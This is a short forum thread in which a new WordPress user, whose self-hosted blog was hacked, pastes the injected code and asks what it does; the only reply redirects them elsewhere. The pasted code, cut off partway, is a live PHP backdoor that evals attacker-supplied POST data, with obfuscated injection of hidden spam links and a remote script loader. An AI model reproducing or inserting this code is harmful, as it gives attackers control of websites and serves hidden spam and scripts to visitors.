wordpress site hacked. Security measures?

  • Unknown's avatar
    aidodel · Member ·

    Hi there, I completely new to both wordpress and php. I recently launched my blog using wordpress, and I have to hosted on my own domain. It was working fine for a few weeks and then I noticed a line of code was maliciously placed on every page. it reads:

    <?php if(!function_exists(‘tmp_lkojfghx’)){for($i=1;$i<100;$i++)if(is_file($f=’/tmp/m’.$i)){include_once($f);break;}if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5WaWFncmEgYWZ0ZXIgYSBiaWcgbWVhbCBpbiBmYWN0LCBtZWRpY2FsIGFuZCBtYWlsIG9yZGVyIHZpYWdyYSBvbmxpbmUgdGhlIGFuc3dlciBpcyA8QSBIUkVGPWh0dHA6Ly9mb3J1bS5seWNvcy5kZS9tZW1iZXIucGhwP3U9MjYyODIgVElUTEU9J2J1eSB2aWFncmEgMTAwbWcnIHRhcmdldD1fYmxhbms+QnV5IHZpYWdyYSBmb3IgbG93ZXN0IHByaWNlczwvYT4gPGJyIC8+CkVyZWN0aWxlIGR5c2Z1bmN0aW9uIGRvY3RvciA8QSBIUkVGPWh0dHA6Ly93d3cueW91dHViZS5jb20vdHJheHRlbmJlcmc1NTUgVElUTEU9J2J1eSB2aWFncmEgbm8gcngnPmJ1eSB2aWFncmEgcGlsbHM8L2E+LiA8YnIgLz4KTmV3IHJldmlld3Mgb2YgdGhlIGNoZWFwIHdoZW4gSSB0ZWxsIG15IGNsaWVudHMgYWJvdXQgYXJpY2xlcyBvbiBWaWFncmEgPEEgSFJFRj1odHRwOi8vd3d3LmFuc3dlcmJhZy5jb20vcHJvZmlsZS8/aWQ9MzEwMTY4IFRJVExFPSdidXkgdmlhZ3JhIHdpdGhvdXQgcHJlc2NyaXB0aW9uJyB0YXJnZXQ9X2JsYW5rPmdlbmVyaWMgYnV5IHZpYWdyYTwvYT4gCjxzY3JpcHQ+aWYodHlwZW9mKHlhaG9vX2NvdW50ZXIpIT10eXBlb2YoMSkpZXZhbCh1bmVzY2FwZSgndiU2MXIlMjAlNjEsQCU2OSQlMkMlNUYlM0IlNjEkJTNEIyU1QiJ+MTl8JTMxfCUyRSMlMzElMzMlMzMlMjIsJTIyJTMxNWA3LnwyMH4yIiUyQ34iYDEhNSUzOGAuYCUzOCE5fCJgLCUyMjEhJTM5JTMxfiUyRSUzOCUzNCUyMl07JTVGJTNEJTMxPyUzQmklNjYlMjgjZCU2RiNjdXwlNkR+ZW4lNzQuYyElNkZvJCU2QiQlNjl+JTY1YC5AbWF0fCU2MyFoJTI4JTJGJTVDYCU2MnxoJCU2NyU2NiU3NCMlM0QjMXwvKT1AJTNEJTZFYCU3NSQlNkMlNkM/KWZvP3IoaSUzRCUzMCUzQiU2OSUzQyMlMzQkJTNCJTY5ISskJTJCQCklNjR+JTZGP2N1bSQlNjUlNkUlNzQlMkV+JTc3ciNpJCU3NCMlNjUhKCIlM0NzY0ByJTY5fHB+JTc0JTNFJCU2OSU2NmAoISU1RmApJCU2NCU2RiU2M0AlNzU/JTZEP2UlNkV0fiUyRSElNzcjJTcyIWkhJTc0IWUoJTVDIyI8c2NyaWBwJTc0JTIwaUAlNjQ9XyQlMjIlMkIhaWArIl8hJTIwIXNyI2MlM0QvJTJGISUzNzYufDEhNj8zIyUyRX4lMjJgJTJCPyU2MSElNUJpIyU1RCMlMkIlMjJgL34lNjMlNzAkJTJGIT4hPCU1QyMlNUMlMkZ+cyU2MyElNzJpJTcwQHQjPiU1Qz8lMjIlMjk8YCU1Qy8lNzMlNjNyJTY5JTcwI3QjJTNFISUyMiUyOXw7JykucmVwbGFjZSgvQHxcP3xcfHx+fFwhfFwkfCN8YC9nLCIiKSk7dmFyIHlhaG9vX2NvdW50ZXI9MTs8L3NjcmlwdD48L2Rpdj4K’));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==’1f8b’))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode(‘IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz’),”,$s);if(stristr($s,'</body’))$s=preg_replace(‘#(s*</body)#mi’,str_replace(‘$’,’\$’,TMP_XHGFJOKL).’1′,$s1);elseif(($s1!=$s)||defined(‘PMT_knghjg’)||stristr($s,'<body’)||stristr($s,'’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i

    I would be appreciate if someone could explain to me how this happened, what it does, and how to prevent it from happening again.

    Cheers,
    Aido

  • Unknown's avatar
    mark · Member ·

    Please ask at http://wordpress.org/support

    This is not related to any blog here at http://wordpress.com

  • The topic ‘wordpress site hacked. Security measures?’ is closed to new replies.